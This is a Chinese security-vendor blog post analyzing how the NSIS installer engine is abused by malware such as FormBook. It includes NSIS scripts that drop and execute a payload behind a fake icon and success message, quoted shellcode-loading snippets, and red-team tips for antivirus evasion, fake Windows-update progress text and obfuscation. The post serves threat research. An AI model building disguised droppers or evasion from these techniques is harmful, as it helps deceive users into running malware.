NSIS安装程序生成引擎利用面及实战战法分析
2021-09-02 10:21:08 Author: blog.nsfocus.net(查看原文) 阅读量:53 收藏

阅读: 3

一、简介

NSIS(Nullsoft Scriptable Install System)是一个windows平台上合法的安装程序生成引擎,可以将安装的所需的文件打包到一个exe安装程序中。NSIS是一个”脚本化“的生成引擎,可直接由用户编辑的脚本生成exe格式的安装程序。NSIS脚本中提供的内部API可以完成如注册表操作、文件操作、进程操作等敏感操作,甚至可以方便地直接调用windows API。这种灵活而强大的特性导致其被攻击者滥用以执行恶意代码。恶意软件家族FormBook在进行信息窃取和命令控制时,就曾多次利用过NSIS执行恶意行为,在之前的攻击技术研判中已有介绍。相比单纯的恶意程序,在一个合法的安装程序生成引擎中执行恶意的代码,达到”真中有假,假中有真”的效果。

本文将对NSIS这一脚本化的安装程序生成引擎的利用面进行分析,基于历史在野利用案例,挖掘这项技术在蓝军实战中的应用价值,并从防御规避的角度进行一些攻击手法的改进尝试。

二、脚本利用面分析

1、释放并执行文件

a. File可以打包文件,使用SetOutPath设置安装目录,在安装过程中会释放到指定目录 。

b.Exec可以执行外部程序,使用该命令执行语句。

1 # set the outfile path 
2 SetOutPath $INSTDIR
3 # include the Malicious software
4 File Malicious.exe
5 # execute the malicious software
6 Exec "$INSTDIR\Malicious.exe"

2、NSIS可调用windows API

使用System::Call脚本语句调用windows API。

1System::Call "kernel32::VirtualAlloc(i 0,i 799,i 4096,i 0x40)i.r9"

3、调用dll的导出函数

使用System::Call脚本语句调用dll的导出函数。

1 File YourDLLName.dll
2 System::Call 'YourDLLName::YourDllFunction(i, *i, t) i(.r0, r1, .r2) .r3'

4、伪装图标

使用Icon脚本语句修改图标,进行伪装。

1 Icon "icon.ico"

三、牛刀小试-编写脚本实现安装器

编译生成伪装图标的恶意安装器,执行后释放恶意exe并执行。

1、编写NSIS脚本

编写脚本,使用NSIS实现简单的安装器。实现过程如下: 

  1. 设置下载器的文件名 
  2. 伪装图标 
  3. 设置释放目录
  4. 打包文件并执行 
  5. 弹窗显示 ”下载成功“

基本实现脚本如下:

 1 # set the name of the installer 
 2 Outfile "Installer.exe"
 3 # set the ico of the installer
 4 Icon "icon.ico"
 5 # create a default section.
 6 Section
 7 # set the outfile path
 8 SetOutPath $INSTDIR
 9 # include the Malicious software
10 File Malicious.exe
11 # execute the malicious software
12 Exec "$INSTDIR\Untitled.exe"
13 # set a msg box noted "install success"
14 MessageBox MB_OK "install success"
15 SectionEnd

如上边的脚本所示,nsis可以通过简单的脚本完成与其他恶意程序相似的文件捆绑行为,并执行。

2、手动编译执行

如下图所示脚本写好后,使用nsis加载完会生成exe程序。

实际效果如下:

加载文件成功执行后:

生成了exe安装器:

执行效果如下:本身NSIS是一个合法的安装器生成工具,因此生成的安装器足够真实,设置图标,设置弹窗显示安装成功,并且释放并执行恶意程序,达到攻击效果。

3、命令行执行实现自动化

mskensis.exe在NSIS中用于执行nsi脚本,生成安装器

1 makensis [ option | script.nsi | - ] [...]

4、利用场景

NSIS作为安装器生成引擎可以生成各类安装器,因此,可以伪装成各类安装器,实现安装过程,并提示成功,如:补丁安装,程序安装,系统更新安装包等。 

例子如下,假装成Google的安装程序:

四、在野利用手法纵析

1、执行shellcode

在FormBook这一常用于信息窃取和命令控制的商业恶意软件家族中,在早期的样本中有使用NSIS分发恶意代码的行为,以windows API调用shellcode的二进制文件并执行代码。步骤如下: 

  1. 给shellcode分配内存 
  2. 使用windows api 创建文件 
  3. 修改内存读写属性 
  4. 读取文件并调用
 1 Function .onInit
 2 InitPluginsDir
 3 SetOutPath $INSTDIR
 4 File 5e9ikl8w3iif7ipp6
 5 File 3ugs67ip868x5n
 6 File tjdorfrldbgdlq
 7 System::Alloc 1024 ;
 8 Pop $0
 9 System::Call "kernel32::CreateFile(t'$INSTDIR\tjdorfrldbgdlq', i 0x80000000, i 0, p 0, i 3, i 0, i
10 0)i.r10" ; 
11 System::Call "kernel32::VirtualProtect(i r0, i 1024, i 0x40, p0)p.r1" ; 
12 System::Call "kernel32::ReadFile(i r10, i r0, i 1024, t., i 0) i .r3" ; 
13 System::Call ::$0() ; shellcode
14 Call func_80

2、调用DLL导出函数解密执行

同样,在今年2月份所发现的FormBook的变种NSIS恶意程序中,采用的是更隐匿的方式执行防御规避,在NSIS中含有具有解密功能的恶意dll文件,用于解密加密的payload。解密之后再调用执行,实现恶意行为。步骤如下: 

  1. 在NSIS生成的安装器中包含恶意的dll以及加密后的payload。 
  2. 在运行过程中执行dll对加密后的payload进行解密并执行,实现恶意行为。
 1 Function .onInit
 2 SetOutPath $INSTDIR
 3 File $INSTDIR\o15bmldpqdxcin.dll ; dll
 4 File $INSTDIR\emvmcmzr.n ;payload
 5 System::Call $INSTDIR\o15bmldpqdxcin.dll::Gxkeoxkzs(w$\"$INSTDIR\emvmcmzr.n$\") ;dll
 6 DetailPrint label ; detail
 7 StrCpy $0 9
 8 IntOp $0 $0 + 4
 9 Goto $0
10 DetailPrint done
11 FunctionEnd
12

3、在NSIS脚本进行数据解密与加载

更有甚者,不需要解密用的恶意dll,减少了恶意代码在程序中所占的空间,而是直接使用NSIS获取到一块数据与代码块的位置,跳转到代码块的文件,使用该代码进行解密,解密后继续执行解密后的shellcode。

步骤如下: 

  1. 将加密后的数据文件和代码区载入内存中 
  2. 根据加密后的数据文件和代码区之间的偏移量,跳转至代码区 
  3. 执行代码区的代码,实现对加密数据文件的解密
  4. 解密后继续执行代码,执行解密后的恶意代码,形成完整的恶意操作
1 IntOp S2 S2 + 12137 ;offset12137code
2 Push "::S2(t'')" ;

五、攻击改进

1、改变压缩方式,减少被杀毒软件发现的可能

通过设置压缩算法为LZMA,可以减低被杀毒软件发现的可能

1 SetCompressor /SOLID lzma 
2 SetCompressorDictSize 8

在部分的杀毒软件中不会被查杀,效果如下:

2、用插件修改进度条的显示,使其更具真实性。

NSIS是基于脚本命令执行进度而跟进进度条的,为了达到在进度条最后显示”安装成功”的弹窗效果,可以使用脚本/nop指令进行修改。修改前,弹窗出现时,进度条还剩一段:

修改后,弹窗出现时,进度条执行到末端:

3、安装过程中,对show detail处显示的detail进行修饰伪装,使其更加真实

使用DetailPrint脚本语句,修饰安装过程打印的输出信息,从而达到伪装的效果

1 DetailPrint " Windows (KB89461)(13)... "
2 DetailPrint " Windows (KB89231)(23)... "
3 DetailPrint " Windows (KB89312)(33)... "
4 DetailPrint "... "
5 DetailPrint " Windows (KB89461)(13)... "
6 DetailPrint " Windows (KB89231)(23)... "
7 DetailPrint " Windows (KB89312)(33)... "

4、混淆NSIS代码

在微软的报告中曾经出现过NSIS混淆的方法,利用push和pop实现花指令以及在windows API中添加混淆字段,并在后边进行函数还原并调用。这种代码混淆方法利用了NSIS脚本语法的灵活性,对基于字符串的静态特征查杀有较好效果。

六、总结

NSIS对于恶意操作来说是一个常见且有很大的利用空间的利用方式,他有一些对于恶意行为来说很好的优点,如: 

  1. 可以直接操作windows API,调用DLL的导出函数、操作进程、文件等。 
  2. 脚本语句简单易实现,且有丰富的插件可以使用,安装器生成实现上效率高。 
  3. 简单的脚本语句便可以完成恶意程序的伪装和加载,可做出相对真实的安装包形式的钓鱼文件。
  4. 使用加密后的payload和API,以不属于任何一种特定格式的文件,可以规避杀毒软件的静态扫描。
  5. 无论是使用单独的解密dll进行解密还是直接在内存中进行解密,都是规避静态特征检测的好思路。

对于安全攻防研究人员具有一定的参考价值和借鉴意义。

参考链接

[1] https://nsis.sourceforge.io/Main_Page

[2] http://nsis%20discussion/

[3] https://www.microsoft.com/security/blog/2017/03/15/ransomware-operators-are-hiding-malware-deeper-in-installer-packages/

[4] https://blog.malwarebytes.com/threat-intelligence/2021/05/revisiting-the-nsis-based-crypter/

[5] https://mp.weixin.qq.com/s/bfILTCvuaBASdmWTd4BnoQ

版权声明

本站“技术博客”所有内容的版权持有者为绿盟科技集团股份有限公司(“绿盟科技”)。作为分享技术资讯的平台,绿盟科技期待与广大用户互动交流,并欢迎在标明出处(绿盟科技-技术博客)及网址的情形下,全文转发。
上述情形之外的任何使用形式,均需提前向绿盟科技(010-68438880-5462)申请版权授权。如擅自使用,绿盟科技保留追责权利。同时,如因擅自使用博客内容引发法律纠纷,由使用者自行承担全部法律责任,与绿盟科技无关。


文章来源: http://blog.nsfocus.net/nsis-file/
如有侵权请联系:admin#unsafe.sh